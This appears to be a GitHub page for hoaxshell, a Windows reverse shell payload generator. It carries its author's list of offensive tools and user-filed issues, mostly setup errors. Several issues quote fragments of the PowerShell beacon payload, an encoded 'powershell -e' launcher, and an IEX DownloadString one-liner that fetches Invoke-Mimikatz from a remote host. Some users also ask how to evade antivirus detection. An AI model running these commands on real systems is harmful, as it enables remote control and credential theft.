
hoaxshell's Introduction

Connect with me / Support:

Hi, I'm t3l3machus, Penetration Tester & Cybersec Researcher from Athens, Greece 🇬🇷, currently living in Poland 🇵🇱.
If you like the tools I make, please show some love by following me, buymeacoffee, throwing a star here and there, or just giving respect on HackTheBox.

Projects:

💥 Offensive Security Tools

Villain: A C2 backdoor generator and multi-session handler.
toxssin: An XSS exploitation command-line interface.
hoaxshell: A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.
psudohash: A password list generator based on keywords mutated by commonly used patterns and more.
PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bit of theory for manually obfuscating PowerShell scripts.
eviltree: A python3 remake of the classic "tree" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches.
wwwtree: A utility for quickly and easily locating, web hosting and transferring resources during PrivEsc.
CVE-2023-22960: PoC for CVE-2023-22960 (Brute-force Lexmark printers).
Synergy Httpx: A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically (e.g. payloads).
BabelStrike: Performs Romanization and name-to-usernames conversion of full name lists.
pentest-pivoting: A network pivoting guide for pentests / CTFs.
⚡ Other Tools, Guides, etc

ssh-log-alert: Receive email alerts on successful ssh logins (mailgun).
gmail-ssh-log-alert: Receive email alerts on successful ssh logins (gmail).
cybersec-service-metrics: A spreadsheet designed to automatically generate Key Performance Indicators for Cyber Security Services based on documented data. Ideal for Team leaders / Managers of small-medium sized organizations.
Awesome-AI: A list of awesome AI resources around the internet.
OWASP-Testing-Guide-Checklist: OWASP based Web Application Security Testing Checklist.
:octocat: Contributions

nuclei-templates: Templates are the core of the nuclei scanner which powers the actual scanning engine. Contribution: templates contributed: CVE-2024-2340, sap-public-admin.
reverse-shell-generator (revshells.com): Hosted Reverse Shell generator with a ton of functionality. Contribution: added HoaxShell and front-end style improvements.

hoaxshell's People

Contributors

brightio, shariqmalik, t3l3machus


hoaxshell's Issues

Ngrok support

Is there any chance to add ngrok support to be able to use ngrok instead of port-forwarding?

domain as server

./hoaxshell.py -s 0.tcp.sa.ngrok.io -p 17272 -o

┬ ┬ ┌─┐ ┌─┐ ─┐ ┬ ┌─┐ ┬ ┬ ┌─┐ ┬   ┬
├─┤ │ │ ├─┤ ┌┴┬┘ └─┐ ├─┤ ├┤  │   │
┴ ┴ └─┘ ┴ ┴ ┴ └─ └─┘ ┴ ┴ └─┘ ┴─┘ ┴─┘
                       by t3l3machus

[Debug] IP address is not valid.

Any help?

[BUG] Invalid server address returned by "def ngrok_address"

OS: Windows 11 Insider Preview
Python version: 3.9.6

Steps to reproduce

py hoaxshell.py -ng -i
hoaxshell> payload
...

When creating a tunnel, the line
t=2022-10-12T21:37:19-0600 lvl=info msg="started tunnel" obj=tunnels name="command_line (http)" addr=http://localhost:8080 url=http://x-x-x-x-x.ngrok.io
appears to be a "Valid address".
Then, running the payload on the victim's machine fails because of it (Invalid address).

The problem is that ngrok's output doesn't have https:// in it, so using this regex:

 url = re.compile(r".*url=(http|https):\/\/(.*)").findall(line)[0][1]  # 'line' stands for the ngrok log line (name assumed)

doesn't throw an error and runs the reverse shell with the expected behaviour.


Btw sorry for my typos, I don't speak English natively :p

The ampersand (&) character is not allowed.

IEX : At line:1 char:16
+ (echo bff3dbcb & cd)
+                ~
The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:1 char:256
+ ... -ne 'None') {$r=I''E''X $c -ErrorAction Stop -ErrorVariable e;$r=Out- ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : AmpersandNotAllowed,Microsoft.PowerShell.Commands.InvokeExpressionCommand

Localtunnel not establishing connection

Hello,
I've been recently playing around with hoaxshell and trying to make its connection go through localtunnel, instead of running it on a local network. I managed to make it work with Ngrok, but this has a limit of 20 connections per minute, which is easily reached by running a few commands. With localtunnel, no errors arise when running the payload in PowerShell, but no connection is found; nothing happens. This happened both when connected to the same local network and on two separate ones.

Here are the commands I ran on Linux:
cd hoaxshell/
sudo python3 hoaxshell.py -lt

On windows powershell:
powershell -e JABzAD0AJwBlAGEAcwB [...] fQA=

Am I doing this correctly?

No shell ?

Hi Team,
Could anyone advise why I am receiving the connection back when I try with netcat but nothing happens when I start the listener?

Logo kind of sus

Ngl the "X" character in the logo is looking kind of sus ඞ

hoaxshell is picked up by Defender for Endpoint, alerts are triggered in Sentinel and activity can be audited in Defender 365 as a result

Sentinel Alert: 'A command in PowerShell was executed by a suspicious process. PowerShell is often used by attackers to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace. An attacker might be executing commands in the system.'

Alerts are on behavior according to Defender 365

Is the undetectable claim for signature based detection?

Thank you

Advice for upgrade

You need to add some more features, at least downloading and uploading to the victim's PC.

UnicodeEncodeError: codec can't encode character

Hi, I want to start the reverse shell and get this error:

Traceback (most recent call last):
  File "hoaxshell.py", line 768, in <module>
    main()
  File "hoaxshell.py", line 549, in main
    chill() if quiet else print_banner()
  File "hoaxshell.py", line 165, in print_banner
    print(f" {''.join(final)}")
UnicodeEncodeError: 'latin-1' codec can't encode character '\u252c' in position 24: ordinal not in range(256)

It's interesting that when I run Villain I get the same error:
Traceback (most recent call last):
  File "Villain.py", line 928, in <module>
    main()
  File "Villain.py", line 509, in main
    chill() if args.quiet else print_banner()
  File "Villain.py", line 93, in print_banner
    print(f" {''.join(final)}")
UnicodeEncodeError: 'latin-1' codec can't encode character '\u252c' in position 25: ordinal not in range(256)

How do I fix it?

Issue - invoke command NOT working

PS C:\Users\Administrsator>powershell IEX(New-Object Net.WebClient).DownloadString('https://MyIP/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"' is NOT working. Error below. Whether it's port 443 or 4443, it's not working. I downloaded the mimikatz ps1 file to the same folder as hoaxshell.py.

Payload is using SSL.

Note: I replaced my ip with "myip" to hide my ip.

Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"
At line:1 char:1
+ powershell IEX(New-Object Net.WebClient).DownloadString('http://192.1 ...
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:108
+ ... ://MyIP:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Comman ...
+                                               ~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

Embedded payload

Is it possible to embed that payload, for example in an image or a file?

Domain does not work

It is not possible to use a domain instead of an IP address.

Line 89: parser.add_argument("-s", "--server-ip", action="store", help = "Your hoaxshell server ip address or domain.")

darkside@darksidepi:~/hoaxshell $ ./hoaxshell.py -s exampledomain.net

┬ ┬ ┌─┐ ┌─┐ ─┐ ┬ ┌─┐ ┬ ┬ ┌─┐ ┬   ┬
├─┤ │ │ ├─┤ ┌┴┬┘ └─┐ ├─┤ ├┤  │   │
┴ ┴ └─┘ ┴ ┴ ┴ └─ └─┘ ┴ ┴ └─┘ ┴─┘ ┴─┘
                       by t3l3machus

[Debug] IP address is not valid.

How to use hoaxshell with ngrok?

I already have ngrok installed but when I use the command python3 hoaxshell.py - ng it says ngrok is not installed.

Do I need to modify the code in hoaxshell.py to get ngrok to work? If yes please tell me how to do it.

Detected by antivirus!!

I tried to run the powershell -e * generated by hoaxshell, but it returned this error:

At line:1 char:1
+
$s='*.*.*.*:8080';$i='c55b3450-03c33f0f-4e17c4ce';$p='http://';$v
...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your
antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

The sole purpose of hoaxshell is being undetectable; is there any way this could be fixed (or has antivirus now got a footprint of hoaxshell)!?

package gnureadline not installing on windows python 3.10

pip3 install gnureadline==8.1.2
Looking in indexes: https://mirrors.aliyun.com/pypi/simple/
Collecting gnureadline==8.1.2
  Using cached https://mirrors.aliyun.com/pypi/packages/f2/e8/48c0162a732522c7b4568da35ed07d0db07d725f640676b4c9a8ec874d1a/gnureadline-8.1.2.tar.gz (3.1 MB)
  Installing build dependencies ... done
  Getting requirements to build wheel ... error
  error: subprocess-exited-with-error

  × Getting requirements to build wheel did not run successfully.
  │ exit code: 1
  ╰─> [1 lines of output]
      Error: this module is not meant to work on Windows (try pyreadline instead)
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error

× Getting requirements to build wheel did not run successfully.
│ exit code: 1
╰─> See above for output.

note: This error originates from a subprocess, and is likely not a problem with pip.

ModuleNotFoundError: No module named 'gnureadline'

Error with -encodedcommand base64

I used randomize-variable.py from the powershell-obfuscation-bible to obfuscate the normal http payload, but after executing it, it isn't spawning the shell, it just hangs.
I ran it with powershell -e and it gives an error about the -encodedcommand base64.
I tried encoding it in base64 using $c = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($c)) but then the hoaxshell terminal gives an error decoding to utf8.

use with rubber ducky?

Is it possible to make hoaxshell generate the same payload every time so you can use a Rubber Ducky?

Not working with ngrok

Hello, when I run the command sudo python3 hoaxshell.py -ng,
I get the following error:
[Debug] Failed to initiate tunnel. Possible cause: You have a tunnel agent session already running in the bg/fg.

ddns support

Feath-Linux% ./hoaxshell.py -s test.duckdns.org

┬ ┬ ┌─┐ ┌─┐ ─┐ ┬ ┌─┐ ┬ ┬ ┌─┐ ┬   ┬
├─┤ │ │ ├─┤ ┌┴┬┘ └─┐ ├─┤ ├┤  │   │
┴ ┴ └─┘ ┴ ┴ ┴ └─ └─┘ ┴ ┴ └─┘ ┴─┘ ┴─┘
                       by t3l3machus

[Debug] IP address is not valid.

Not working

Whenever I try to input the payload it gets detected immediately, any idea on how to fix this? Any help would be helpful.
Thanks!

Accidental Swastika

I haven't even used this yet, but the 'X' in the image of the README looks a lot like the famous Nazi symbol. You might want to redesign that letter

Crashes when changing directory

Hi - good job on the FUD on Win Defender.
I'm having an issue where I'm not able to cd to any dir.
The same issue occurs when opening calc.exe.
Stack trace shows:

hoaxshell > calc.exe
----------------------------------------
Exception occurred during processing of request from ('100.77.140.74', 50237)
Traceback (most recent call last):
  File "/usr/lib/python3.10/socketserver.py", line 316, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib/python3.10/socketserver.py", line 347, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib/python3.10/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.10/socketserver.py", line 747, in __init__
    self.handle()
  File "/usr/lib/python3.10/http/server.py", line 425, in handle
    self.handle_one_request()
  File "/usr/lib/python3.10/http/server.py", line 413, in handle_one_request
    method()
  File "/opt/hoaxshell/hoaxshell.py", line 306, in do_POST
    to_b_numbers = [ int(n) for n in bin_output ]
  File "/opt/hoaxshell/hoaxshell.py", line 306, in <listcomp>
    to_b_numbers = [ int(n) for n in bin_output ]
ValueError: invalid literal for int() with base 10: ''

It doesn't seem to me that it is the syntax either.

Invoke-WebRequest and Invoke-Expression

When I try to run the payload from my Linux Kali VMware machine on my Win11 PC, I get "Invoke-WebRequest can't establish a connection to the remote desktop" and "Invoke-Expression : Cannot bind argument to parameter 'Command' because it is null".

Any ideas how to fix this?

Antivirus blocked it

when running the payload, I get "This script contains malicious content and has been blocked by your antivirus software" bummer

Cant install gnureadline

Unable to install requirements.txt because of gnureadline

Using cached gnureadline-8.1.2.tar.gz (3.1 MB)
Installing build dependencies ... done
Getting requirements to build wheel ... error
error: subprocess-exited-with-error

× Getting requirements to build wheel did not run successfully.
│ exit code: 1
╰─> [1 lines of output]
Error: this module is not meant to work on Windows (try pyreadline instead)
[end of output]

note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error

× Getting requirements to build wheel did not run successfully.
│ exit code: 1
╰─> See above for output.

note: This error originates from a subprocess, and is likely not a problem with pip.

edit: solved

When I try to paste it into PowerShell I get this error

Invoke-Expression : Cannot bind argument to parameter 'Command' because it is null.
At line:1 char:289
+ ... rs @{"X-7f3a-d0cd"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorA ...
+                                                          ~~
    + CategoryInfo          : InvalidData: (:) [Invoke-Expression], ParameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.InvokeExpressionCommand

Don't use IE

If you never used IE, you can avoid this attack.

Detected by fully patched Win10 machine with no additional antivirus

Hello there, I tested Hoaxshell 3 days ago on my machine and it worked with fully patched Windows with Defender active.

Now, when I launch the payload on the target, it shows

"This skript contains malicious content and is blocked by your antivirus software"

Sadly I have no screenshots or anything else, because my PC is in German.
